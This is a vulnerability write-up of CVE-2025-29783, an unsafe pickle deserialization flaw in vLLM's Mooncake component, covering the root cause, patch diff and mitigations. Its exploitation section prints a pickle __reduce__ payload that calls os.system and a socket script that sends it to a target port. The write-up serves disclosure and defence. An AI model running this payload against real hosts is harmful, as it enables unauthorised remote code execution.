CVE-2025-29783: Remote Code Execution in vLLM via Unsafe Deserialization in Mooncake
Executive Summary
CVE-2025-29783 is a critical remote code execution (RCE) vulnerability affecting vLLM, a high-throughput and memory-efficient inference and serving engine for Large Language Models (LLMs). The vulnerability stems from the use of unsafe deserialization via pickle
within the Mooncake component, which is used for distributed key-value (KV) cache management. When vLLM is configured to use Mooncake, this vulnerability allows unauthenticated attackers to execute arbitrary code on distributed hosts by sending malicious serialized data over ZMQ/TCP on all network interfaces. The fix involves replacing pickle
with safetensors
for serialization, mitigating the risk of RCE. This vulnerability has a CVSS v3.1 base score of 10.0, indicating its critical severity.
Technical Details
The vulnerability resides in the mooncake_pipe.py
file within the vLLM project, specifically in the vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
module. This module is responsible for transferring KV caches between distributed nodes using ZeroMQ (ZMQ) over TCP. The affected versions are prior to 0.8.0. The core issue is the use of Python's pickle
module to serialize and deserialize tensor data during the transfer process.
The vulnerable code is located within the _send_impl
and _recv_impl
methods of the MooncakeKVPipe
class. These methods are responsible for sending and receiving tensor data, respectively.
def _send_impl(self, tensor: torch.Tensor) -> None:
"""Implement the tensor sending logic."""
value_bytes = pickle.dumps(tensor)
self.transfer_engine.send_bytes(value_bytes)
def _recv_impl(self) -> torch.Tensor:
"""Implement the tensor receiving logic."""
data = self.transfer_engine.recv_bytes()
return pickle.loads(data)
The pickle.dumps()
function serializes the tensor into a byte stream, which is then sent over the network. On the receiving end, pickle.loads()
deserializes the byte stream back into a tensor. The problem with pickle
is that it is inherently unsafe when dealing with untrusted data. Deserializing a pickle
stream can execute arbitrary Python code embedded within the stream.
Affected systems are those running vLLM with Mooncake enabled for distributed KV cache management. This typically involves a cluster of machines communicating over a network using ZMQ/TCP. The vulnerability is exposed on all network interfaces, meaning that any machine on the network (or even outside the network if the ports are exposed) can potentially exploit it.
Root Cause Analysis
The root cause of CVE-2025-29783 is the use of Python's pickle
module for serializing and deserializing data in a network-exposed service. pickle
is known to be vulnerable to arbitrary code execution because the deserialization process can instantiate arbitrary Python objects, including those that execute system commands or perform other malicious actions.
The MooncakeKVPipe
class in vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
uses pickle
to serialize PyTorch tensors before sending them over the network and to deserialize them upon receipt. This means that an attacker who can send data to the ZMQ/TCP port used by Mooncake can inject malicious pickle
payloads that will be executed by the receiving vLLM instance.
Here's a breakdown of how the vulnerability can be exploited:
-
Attacker crafts a malicious pickle payload: The attacker creates a
pickle
stream that, when deserialized, will execute arbitrary Python code. This can be achieved using various techniques, such as using the__reduce__
method to specify a function to be called during deserialization. -
Attacker sends the malicious payload to the vLLM instance: The attacker sends the crafted
pickle
stream to the ZMQ/TCP port used by the Mooncake component of vLLM. -
vLLM instance deserializes the payload: The receiving vLLM instance calls
pickle.loads()
on the received data, which deserializes the malicious payload and executes the embedded code. -
Arbitrary code execution: The attacker's code is executed on the vLLM instance, allowing them to perform actions such as reading sensitive data, modifying files, or even taking complete control of the system.
The following is an example of a malicious pickle payload that executes the uname -a
command:
import pickle
import os
class RCE:
def __reduce__(self):
cmd = ('uname', '-a')
return (os.system, cmd)
serialized_data = pickle.dumps(RCE())
# This serialized_data can be sent to the vulnerable vLLM instance
# When the vLLM instance deserializes this data using pickle.loads(),
# it will execute the uname -a command.
This payload defines a class RCE
with a __reduce__
method. The __reduce__
method is a special method that pickle
uses to determine how to serialize and deserialize an object. In this case, it tells pickle
to call the os.system
function with the arguments ('uname', '-a')
when the object is deserialized.
Patch Analysis
The fix for CVE-2025-29783 involves replacing the use of pickle
with safetensors
for serializing and deserializing tensor data in the MooncakeKVPipe
class. safetensors
is a safer alternative to pickle
because it only allows the serialization and deserialization of tensor data and does not allow arbitrary code execution.
The following diff
shows the changes made to vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
:
--- a/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
+++ b/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py
@@ -2,13 +2,14 @@
import json
import os
-import pickle
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from typing import Optional, Union
import torch
import zmq
+from safetensors.torch import load as safetensors_load
+from safetensors.torch import save as safetensors_save
from vllm.config import KVTransferConfig
from vllm.distributed.kv_transfer.kv_pipe.base import KVPipeBase
@@ -237,14 +238,13 @@ def tensor_hash(self, tensor: torch.Tensor) -> int:
return hash(tensor.data_ptr())
def _send_impl(self, tensor: torch.Tensor) -> None:
- """Implement the tensor sending logic."""
- value_bytes = pickle.dumps(tensor)
- self.transfer_engine.send_bytes(value_bytes)
+ """Implement the tensor sending logic using safetensors."""
+ self.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
def _recv_impl(self) -> torch.Tensor:
- """Implement the tensor receiving logic."""
+ """Implement the tensor receiving logic using safetensors."""
data = self.transfer_engine.recv_bytes()
- return pickle.loads(data)
+ return safetensors_load(data)["tensor"].to(self.device)
def send_tensor(self, tensor: Optional[torch.Tensor]) -> None:
"""Send tensor to the target process."""
The patch removes the import pickle
statement and adds import safetensors.torch.load as safetensors_load
and import safetensors.torch.save as safetensors_save
. The _send_impl
method is modified to use safetensors_save
to serialize the tensor into a byte stream, and the _recv_impl
method is modified to use safetensors_load
to deserialize the byte stream back into a tensor. The to(self.device)
call ensures the tensor is placed on the correct device after deserialization.
Specifically, the following lines were changed:
value_bytes = pickle.dumps(tensor)
is replaced withself.transfer_engine.send_bytes(safetensors_save({"tensor": tensor}))
return pickle.loads(data)
is replaced withreturn safetensors_load(data)["tensor"].to(self.device)
The safetensors_save
function takes a dictionary as input, where the keys are names for the tensors and the values are the tensors themselves. In this case, the tensor is named "tensor". The safetensors_load
function returns a dictionary containing the deserialized tensors. The ["tensor"]
syntax is used to access the tensor named "tensor" from the dictionary.
This change effectively eliminates the possibility of arbitrary code execution because safetensors
only allows the serialization and deserialization of tensor data and does not allow the execution of arbitrary Python code.
Exploitation Techniques
Given the vulnerability is an unsafe deserialization issue, an attacker can craft a malicious payload using pickle
that, when deserialized by the vulnerable vLLM instance, executes arbitrary code.
Here's a conceptual proof-of-concept (PoC) demonstrating how an attacker could exploit this vulnerability. This PoC is made-up and serves to illustrate the general principle of exploiting pickle
vulnerabilities. A real exploit would need to be adapted to the specific environment and dependencies of the vLLM instance.
import socket
import pickle
import os
# Target information
TARGET_HOST = "vulnerable_vllm_host"
TARGET_PORT = 12345 # Replace with the actual Mooncake port
# Malicious payload
class RCE:
def __reduce__(self):
# Command to execute on the target system
cmd = ('touch', '/tmp/pwned') # Creates a file /tmp/pwned
return (os.system, cmd)
payload = pickle.dumps(RCE())
# Create a socket and connect to the target
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((TARGET_HOST, TARGET_PORT))
print(f"Connected to {TARGET_HOST}:{TARGET_PORT}")
# Send the malicious payload
sock.sendall(payload)
print("Malicious payload sent.")
except socket.error as e:
print(f"Socket error: {e}")
finally:
sock.close()
print("Connection closed.")
Explanation:
-
Target Information: The
TARGET_HOST
andTARGET_PORT
variables need to be set to the IP address and port number of the vulnerable vLLM instance's Mooncake component. -
Malicious Payload: The
RCE
class defines a__reduce__
method that, when deserialized, will execute thetouch /tmp/pwned
command on the target system. This command creates a file named/tmp/pwned
in the/tmp
directory, which is a simple way to verify that the code execution was successful. -
Socket Connection: The code creates a socket and connects to the target host and port.
-
Payload Transmission: The code sends the malicious
pickle
payload to the target system. -
Error Handling: The code includes basic error handling to catch socket errors.
Attack Scenario:
- The attacker identifies a vLLM instance running with Mooncake enabled.
- The attacker determines the ZMQ/TCP port used by Mooncake (e.g., by examining the vLLM configuration).
- The attacker crafts a malicious
pickle
payload as shown above. - The attacker executes the PoC script, sending the malicious payload to the vLLM instance.
- If the exploit is successful, the
touch /tmp/pwned
command will be executed on the vLLM instance, creating the/tmp/pwned
file.
Real-World Impacts:
The impact of this vulnerability is severe. An attacker who successfully exploits this vulnerability can gain complete control of the vLLM instance and potentially the entire cluster of machines running vLLM. This could lead to:
- Data Breach: The attacker could steal sensitive data processed by the LLMs.
- System Compromise: The attacker could install malware, create backdoors, or use the compromised systems to launch attacks against other targets.
- Denial of Service: The attacker could crash the vLLM instance or disrupt its operation.
- Reputation Damage: A successful attack could damage the reputation of the organization using vLLM.
Mitigation Strategies
To mitigate the risk of CVE-2025-29783, the following steps should be taken:
-
Upgrade to vLLM 0.8.0 or later: This version contains the fix for the vulnerability, which replaces
pickle
withsafetensors
for serialization. -
Disable Mooncake if not needed: If distributed KV cache management is not required, disable Mooncake to eliminate the vulnerability.
-
Network Segmentation: Isolate the vLLM cluster from the rest of the network to limit the potential impact of a successful attack. Use firewalls to restrict access to the ZMQ/TCP port used by Mooncake.
-
Authentication and Authorization: Implement authentication and authorization mechanisms to control who can send data to the Mooncake component. This can help prevent unauthorized users from exploiting the vulnerability. However, note that the vulnerability is present even without authentication, so upgrading to the patched version is still essential.
-
Monitoring and Intrusion Detection: Implement monitoring and intrusion detection systems to detect suspicious activity on the vLLM cluster. This can help identify and respond to attacks in a timely manner.
-
Security Best Practices: Follow general security best practices, such as keeping software up to date, using strong passwords, and educating users about phishing and other social engineering attacks.
Timeline of Discovery and Disclosure
- 2025-03-04: Initial commit addressing the vulnerability.
- 2025-03-19: CVE-2025-29783 assigned and publicly disclosed.
- 2025-03-19: vLLM version 0.8.0 released with the fix.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-29783
- GitHub Advisory: https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7
- Commit fixing the vulnerability: https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2
- Pull Request fixing the vulnerability: https://github.com/vllm-project/vllm/pull/14228